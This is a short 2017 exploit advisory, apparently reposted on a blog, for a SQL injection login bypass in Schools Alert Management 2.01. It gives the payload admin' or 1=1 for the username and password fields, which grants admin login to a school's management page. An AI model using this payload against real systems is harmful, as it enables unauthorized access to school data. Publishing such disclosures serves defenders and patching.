Aug 28, 2017

Home » , » Exploit: Schools Alert Management - SQL injection login bypass

Exploit: Schools Alert Management - SQL injection login bypass

  1:07 PM  ,

SQL injection login bypass
Schools Alert Management.
Schools Alert Management - SQL injection login bypass, an attacker is able to inject malicious sql query to bypass the login page and login as admin of the particular school.

Proof of Concept: http://localhost/schoolalert/demo_school_name/schools_login.php  [ set username and password ] to >>  admin' or 1=1 - you must choose the check box as management

Exploit Author: Ali BawazeEer
Dork: N/A
Date: 28.08.2017
Vendor Homepage: http://www.phpscriptsmall.com/product/schools-alert-management-system/
Version: 2.01
Category: Webapps
Tested on: Win / Mozila Firefox

 

AdBlock Detected!

Like this blog? Keep us running by whitelisting this blog in your ad blocker.

This is how to whitelisting this blog in your ad blocker.

Thank you!

×